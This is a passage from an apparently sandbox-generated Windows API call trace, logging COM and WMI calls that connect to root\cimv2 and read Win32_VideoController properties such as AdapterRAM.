This=0x66fc70, riid=0x6c04fb20*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19eab4 | out: ppvObject=0x19eab4*=0x0) returned 0x80004002 [0279.432] IUnknown:QueryInterface (in: This=0x663398, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e88c | out: ppvObject=0x19e88c*=0x0) returned 0x80004002 [0279.432] WbemLocator:IUnknown:AddRef (This=0x66fc70) returned 0x3 [0279.432] WbemLocator:IUnknown:QueryInterface (in: This=0x66fc70, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e5f4 | out: ppvObject=0x19e5f4*=0x0) returned 0x80004002 [0279.432] WbemLocator:IUnknown:QueryInterface (in: This=0x66fc70, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e5a4 | out: ppvObject=0x19e5a4*=0x0) returned 0x80004002 [0279.432] WbemLocator:IUnknown:QueryInterface (in: This=0x66fc70, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e5b0 | out: ppvObject=0x19e5b0*=0x66fbcc) returned 0x0 [0279.433] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x66fbcc, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e5b8 | out: pCid=0x19e5b8*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0279.433] WbemLocator:IUnknown:Release (This=0x66fbcc) returned 0x3 [0279.433] CoGetContextToken (in: pToken=0x19e610 | out: pToken=0x19e610) returned 0x0 [0279.433] CoGetContextToken (in: pToken=0x19ea18 | out: pToken=0x19ea18) returned 0x0 [0279.433] WbemLocator:IUnknown:QueryInterface (in: This=0x66fc70, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19eaa8 | out: ppvObject=0x19eaa8*=0x66fc54) returned 0x0 [0279.456] WbemLocator:IRpcOptions:Query (in: This=0x66fc54, pPrx=0x66fc70, dwProperty=2, pdwValue=0x19ead0 | out: pdwValue=0x19ead0) returned 0x80004002 [0279.456] WbemLocator:IUnknown:Release (This=0x66fc54) returned 0x3 [0279.456] WbemLocator:IUnknown:Release (This=0x66fc70) returned 0x2 [0279.456] CoGetContextToken (in: pToken=0x19efe8 | out: pToken=0x19efe8) returned 0x0 [0279.456] CoGetContextToken (in: pToken=0x19ef48 | out: pToken=0x19ef48) returned 0x0 [0279.456] WbemLocator:IUnknown:QueryInterface (in: This=0x66fc70, riid=0x19f018*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x19f014 | out: ppvObject=0x19f014*=0x663398) returned 0x0 [0279.456] IUnknown:AddRef (This=0x663398) returned 0x4 [0279.457] IUnknown:Release (This=0x663398) returned 0x3 [0279.457] IUnknown:Release (This=0x663398) returned 0x2 [0279.457] IUnknown:Release (This=0x663780) returned 0x2 [0279.457] SysStringLen (param_1=0x0) returned 0x0 [0279.457] IEnumWbemClassObject:Reset (This=0x663398) returned 0x0 [0279.458] CoTaskMemAlloc (cb=0x4) returned 0x54ba558 [0279.458] IEnumWbemClassObject:Next (in: This=0x663398, lTimeout=-1, uCount=0x1, apObjects=0x54ba558, puReturned=0x226c1c8 | out: apObjects=0x54ba558*=0x553a468, puReturned=0x226c1c8*=0x1) returned 0x0 [0279.465] IUnknown:QueryInterface (in: This=0x553a468, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e898 | out: ppvObject=0x19e898*=0x553a468) returned 0x0 [0279.465] IUnknown:QueryInterface (in: This=0x553a468, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19e854 | out: ppvObject=0x19e854*=0x0) returned 0x80004002 [0279.465] IUnknown:QueryInterface (in: This=0x553a468, riid=0x6c04fb20*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19e674 | out: ppvObject=0x19e674*=0x0) returned 0x80004002 [0279.465] IUnknown:QueryInterface (in: This=0x553a468, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e44c | out: ppvObject=0x19e44c*=0x0) returned 0x80004002 [0279.466] IUnknown:AddRef (This=0x553a468) returned 0x3 [0279.466] IUnknown:QueryInterface (in: This=0x553a468, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e1b4 | out: ppvObject=0x19e1b4*=0x0) returned 0x80004002 [0279.466] IUnknown:QueryInterface (in: This=0x553a468, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e164 | out: ppvObject=0x19e164*=0x0) returned 0x80004002 [0279.466] IUnknown:QueryInterface (in: This=0x553a468, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e170 | out: ppvObject=0x19e170*=0x553a46c) returned 0x0 [0279.466] IMarshal:GetUnmarshalClass (in: This=0x553a46c, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e178 | out: pCid=0x19e178*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0279.466] IUnknown:Release (This=0x553a46c) returned 0x3 [0279.466] CoGetContextToken (in: pToken=0x19e1d0 | out: pToken=0x19e1d0) returned 0x0 [0279.466] CoGetContextToken (in: pToken=0x19e5d8 | out: pToken=0x19e5d8) returned 0x0 [0279.466] IUnknown:QueryInterface (in: This=0x553a468, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e668 | out: ppvObject=0x19e668*=0x0) returned 0x80004002 [0279.466] IUnknown:Release (This=0x553a468) returned 0x2 [0279.466] CoGetContextToken (in: pToken=0x19eba8 | out: pToken=0x19eba8) returned 0x0 [0279.466] CoGetContextToken (in: pToken=0x19eb08 | out: pToken=0x19eb08) returned 0x0 [0279.467] IUnknown:QueryInterface (in: This=0x553a468, riid=0x19ebd8*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x19ebd4 | out: ppvObject=0x19ebd4*=0x553a468) returned 0x0 [0279.467] IUnknown:AddRef (This=0x553a468) returned 0x4 [0279.467] IUnknown:Release (This=0x553a468) returned 0x3 [0279.467] IUnknown:Release (This=0x553a468) returned 0x2 [0279.467] CoTaskMemFree (pv=0x54ba558) [0279.467] CoGetContextToken (in: pToken=0x19ef18 | out: pToken=0x19ef18) returned 0x0 [0279.467] IUnknown:AddRef (This=0x553a468) returned 0x3 [0279.467] IWbemClassObject:Get (in: This=0x553a468, wszName="__GENUS", lFlags=0, pVal=0x19f228*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x19f2a8*=0, plFlavor=0x19f2a4*=0 | out: pVal=0x19f228*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x19f2a8*=3, plFlavor=0x19f2a4*=64) returned 0x0 [0279.467] IWbemClassObject:Get (in: This=0x553a468, wszName="__PATH", lFlags=0, pVal=0x19f20c*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x19f290*=0, plFlavor=0x19f28c*=0 | out: pVal=0x19f20c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XC64ZB\\ROOT\\CIMV2:Win32_VideoController.DeviceID=\"VideoController1\"", varVal2=0x0), pType=0x19f290*=8, plFlavor=0x19f28c*=64) returned 0x0 [0279.467] SysStringByteLen (bstr="\\\\XC64ZB\\ROOT\\CIMV2:Win32_VideoController.DeviceID=\"VideoController1\"") returned 0x8a [0279.467] SysStringByteLen (bstr="\\\\XC64ZB\\ROOT\\CIMV2:Win32_VideoController.DeviceID=\"VideoController1\"") returned 0x8a [0279.467] CoGetObjectContext (in: riid=0x217d1c8*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19f238 | out: ppv=0x19f238*=0x601a94) returned 0x0 [0279.467] IComThreadingInfo:GetCurrentApartmentType (in: This=0x601a94, pAptType=0x19f230 | out: pAptType=0x19f230*=1) returned 0x0 [0279.468] IUnknown:QueryInterface (in: This=0x601a94, riid=0x217d1b0*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x19f234 | out: ppvObject=0x19f234*=0x0) returned 0x80004002 [0279.468] IUnknown:Release (This=0x601a94) returned 0x1 [0279.468] CoGetClassObject (in: rclsid=0x6be02c*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x6bfc54e0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19eba0 | out: ppv=0x19eba0*=0x54ba418) returned 0x0 [0279.469] WbemDefPath:IUnknown:QueryInterface (in: This=0x54ba418, riid=0x6bf795e0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19edb8 | out: ppvObject=0x19edb8*=0x0) returned 0x80004002 [0279.469] WbemDefPath:IClassFactory:CreateInstance (in: This=0x54ba418, pUnkOuter=0x0, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19edcc | out: ppvObject=0x19edcc*=0x5542ba0) returned 0x0 [0279.469] WbemDefPath:IUnknown:Release (This=0x54ba418) returned 0x0 [0279.469] WbemDefPath:IUnknown:QueryInterface (in: This=0x5542ba0, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e9ec | out: ppvObject=0x19e9ec*=0x5542ba0) returned 0x0 [0279.469] WbemDefPath:IUnknown:QueryInterface (in: This=0x5542ba0, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19e9a8 | out: ppvObject=0x19e9a8*=0x0) returned 0x80004002 [0279.469] WbemDefPath:IUnknown:QueryInterface (in: This=0x5542ba0, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e59c | out: ppvObject=0x19e59c*=0x0) returned 0x80004002 [0279.469] WbemDefPath:IUnknown:AddRef (This=0x5542ba0) returned 0x3 [0279.469] WbemDefPath:IUnknown:QueryInterface (in: This=0x5542ba0, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e304 | out: ppvObject=0x19e304*=0x0) returned 0x80004002 [0279.469] WbemDefPath:IUnknown:QueryInterface (in: This=0x5542ba0, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e2b4 | out: ppvObject=0x19e2b4*=0x0) returned 0x80004002 [0279.469] WbemDefPath:IUnknown:QueryInterface (in: This=0x5542ba0, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e2c0 | out: ppvObject=0x19e2c0*=0x5543640) returned 0x0 [0279.469] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x5543640, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e2c8 | out: pCid=0x19e2c8*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0279.469] WbemDefPath:IUnknown:Release (This=0x5543640) returned 0x3 [0279.470] CoGetContextToken (in: pToken=0x19e320 | out: pToken=0x19e320) returned 0x0 [0279.470] CoGetContextToken (in: pToken=0x19e728 | out: pToken=0x19e728) returned 0x0 [0279.470] WbemDefPath:IUnknown:QueryInterface (in: This=0x5542ba0, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e7b8 | out: ppvObject=0x19e7b8*=0x0) returned 0x80004002 [0279.470] WbemDefPath:IUnknown:Release (This=0x5542ba0) returned 0x2 [0279.470] WbemDefPath:IUnknown:Release (This=0x5542ba0) returned 0x1 [0279.470] CoGetContextToken (in: pToken=0x19f0b0 | out: pToken=0x19f0b0) returned 0x0 [0279.470] CoGetContextToken (in: pToken=0x19f010 | out: pToken=0x19f010) returned 0x0 [0279.470] WbemDefPath:IUnknown:QueryInterface (in: This=0x5542ba0, riid=0x19f0e0*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x19f0dc | out: ppvObject=0x19f0dc*=0x5542ba0) returned 0x0 [0279.470] WbemDefPath:IUnknown:AddRef (This=0x5542ba0) returned 0x3 [0279.470] WbemDefPath:IUnknown:Release (This=0x5542ba0) returned 0x2 [0279.470] WbemDefPath:IWbemPath:SetText (This=0x5542ba0, uMode=0x4, pszPath="\\\\XC64ZB\\ROOT\\CIMV2:Win32_VideoController.DeviceID=\"VideoController1\"") returned 0x0 [0279.470] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5542510, puCount=0x19f264 | out: puCount=0x19f264*=0x2) returned 0x0 [0279.470] WbemDefPath:IWbemPath:GetText (in: This=0x5542510, lFlags=4, puBuffLength=0x19f260*=0x0, pszText=0x0 | out: puBuffLength=0x19f260*=0xf, pszText=0x0) returned 0x0 [0279.470] WbemDefPath:IWbemPath:GetText (in: This=0x5542510, lFlags=4, puBuffLength=0x19f260*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f260*=0xf, pszText="\\\\.\\root\\CIMV2") returned 0x0 [0279.470] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5542510, puCount=0x19f230 | out: puCount=0x19f230*=0x2) returned 0x0 [0279.470] WbemDefPath:IWbemPath:GetText (in: This=0x5542510, lFlags=4, puBuffLength=0x19f22c*=0x0, pszText=0x0 | out: puBuffLength=0x19f22c*=0xf, pszText=0x0) returned 0x0 [0279.470] WbemDefPath:IWbemPath:GetText (in: This=0x5542510, lFlags=4, puBuffLength=0x19f22c*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f22c*=0xf, pszText="\\\\.\\root\\CIMV2") returned 0x0 [0279.471] IWbemClassObject:Get (in: This=0x553a468, wszName="AdapterRAM", lFlags=0, pVal=0x19f22c*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x226c9f8*=0, plFlavor=0x226c9fc*=0 | out: pVal=0x19f22c*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x226c9f8*=19, plFlavor=0x226c9fc*=0) returned 0x0 [0279.471] IWbemClassObject:Get (in: This=0x553a468, wszName="AdapterRAM", lFlags=0, pVal=0x19f234*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x226c9f8*=19, plFlavor=0x226c9fc*=0 | out: pVal=0x19f234*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x226c9f8*=19, plFlavor=0x226c9fc*=0) returned 0x0 [0279.471] CoTaskMemAlloc (cb=0x4) returned 0x54ba558 [0279.471] IEnumWbemClassObject:Next (in: This=0x663398, lTimeout=-1, uCount=0x1, apObjects=0x54ba558, puReturned=0x226c1c8 | out: apObjects=0x54ba558*=0x0, puReturned=0x226c1c8*=0x0) returned 0x1 [0279.472] CoTaskMemFree (pv=0x54ba558) [0279.472] CoGetContextToken (in: pToken=0x19f160 | out: pToken=0x19f160) returned 0x0 [0279.472] WbemLocator:IUnknown:Release (This=0x66fc70) returned 0x1 [0279.472] IUnknown:Release (This=0x663398) returned 0x0 [0279.473] CoGetContextToken (in: pToken=0x19f160 | out: pToken=0x19f160) returned 0x0 [0279.473] WbemLocator:IUnknown:Release (This=0x66f870) returned 0x1 [0279.473] IUnknown:Release (This=0x663780) returned 0x0 [0279.504] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6619b0, puCount=0x19f25c | out: puCount=0x19f25c*=0x2) returned 0x0 [0279.504] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f258*=0x0, pszText=0x0 | out: puBuffLength=0x19f258*=0xf, pszText=0x0) returned 0x0 [0279.504] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f258*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f258*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0279.504] CoGetObjectContext (in: riid=0x217d1c8*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19f1e8 | out: ppv=0x19f1e8*=0x601a94) returned 0x0 [0279.504] IComThreadingInfo:GetCurrentApartmentType (in: This=0x601a94, pAptType=0x19f1e0 | out: pAptType=0x19f1e0*=1) returned 0x0 [0279.504] IUnknown:QueryInterface (in: This=0x601a94, riid=0x217d1b0*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x19f1e4 | out: ppvObject=0x19f1e4*=0x0) returned 0x80004002 [0279.504] IUnknown:Release (This=0x601a94) returned 0x1 [0279.505] CoGetClassObject (in: rclsid=0x6bdd2c*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x6bfc54e0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19ee08 | out: ppv=0x19ee08*=0x55436d0) returned 0x0 [0279.505] WbemLocator:IUnknown:QueryInterface (in: This=0x55436d0, riid=0x6bf795e0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19f020 | out: ppvObject=0x19f020*=0x0) returned 0x80004002 [0279.505] WbemLocator:IClassFactory:CreateInstance (in: This=0x55436d0, pUnkOuter=0x0, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19f034 | out: ppvObject=0x19f034*=0x54ba4b8) returned 0x0 [0279.505] WbemLocator:IUnknown:Release (This=0x55436d0) returned 0x0 [0279.505] WbemLocator:IUnknown:QueryInterface (in: This=0x54ba4b8, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ec54 | out: ppvObject=0x19ec54*=0x54ba4b8) returned 0x0 [0279.505] WbemLocator:IUnknown:QueryInterface (in: This=0x54ba4b8, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19ec10 | out: ppvObject=0x19ec10*=0x0) returned 0x80004002 [0279.505] WbemLocator:IUnknown:QueryInterface (in: This=0x54ba4b8, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e804 | out: ppvObject=0x19e804*=0x0) returned 0x80004002 [0279.506] WbemLocator:IUnknown:AddRef (This=0x54ba4b8) returned 0x3 [0279.506] WbemLocator:IUnknown:QueryInterface (in: This=0x54ba4b8, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e56c | out: ppvObject=0x19e56c*=0x0) returned 0x80004002 [0279.506] WbemLocator:IUnknown:QueryInterface (in: This=0x54ba4b8, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e51c | out: ppvObject=0x19e51c*=0x0) returned 0x80004002 [0279.506] WbemLocator:IUnknown:QueryInterface (in: This=0x54ba4b8, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e528 | out: ppvObject=0x19e528*=0x0) returned 0x80004002 [0279.506] CoGetContextToken (in: pToken=0x19e588 | out: pToken=0x19e588) returned 0x0 [0279.506] CoGetContextToken (in: pToken=0x19e990 | out: pToken=0x19e990) returned 0x0 [0279.506] WbemLocator:IUnknown:QueryInterface (in: This=0x54ba4b8, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ea20 | out: ppvObject=0x19ea20*=0x0) returned 0x80004002 [0279.506] WbemLocator:IUnknown:Release (This=0x54ba4b8) returned 0x2 [0279.506] WbemLocator:IUnknown:Release (This=0x54ba4b8) returned 0x1 [0279.506] CoGetContextToken (in: pToken=0x19f000 | out: pToken=0x19f000) returned 0x0 [0279.506] CoGetContextToken (in: pToken=0x19ef60 | out: pToken=0x19ef60) returned 0x0 [0279.506] WbemLocator:IUnknown:QueryInterface (in: This=0x54ba4b8, riid=0x19f030*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x19f02c | out: ppvObject=0x19f02c*=0x54ba4b8) returned 0x0 [0279.506] WbemLocator:IUnknown:AddRef (This=0x54ba4b8) returned 0x3 [0279.506] WbemLocator:IUnknown:Release (This=0x54ba4b8) returned 0x2 [0279.506] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6619b0, puCount=0x19f1c4 | out: puCount=0x19f1c4*=0x2) returned 0x0 [0279.506] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=8, puBuffLength=0x19f1c0*=0x0, pszText=0x0 | out: puBuffLength=0x19f1c0*=0xf, pszText=0x0) returned 0x0 [0279.506] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=8, puBuffLength=0x19f1c0*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f1c0*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0279.506] CoCreateInstance (in: rclsid=0x6d3c1284*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x6d3c12e4*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x19f09c | out: ppv=0x19f09c*=0x54ba478) returned 0x0 [0279.506] WbemLocator:IWbemLocator:ConnectServer (in: This=0x54ba478, strNetworkResource="\\\\.\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x19f130 | out: ppNamespace=0x19f130*=0x67f270) returned 0x0 [0279.532] 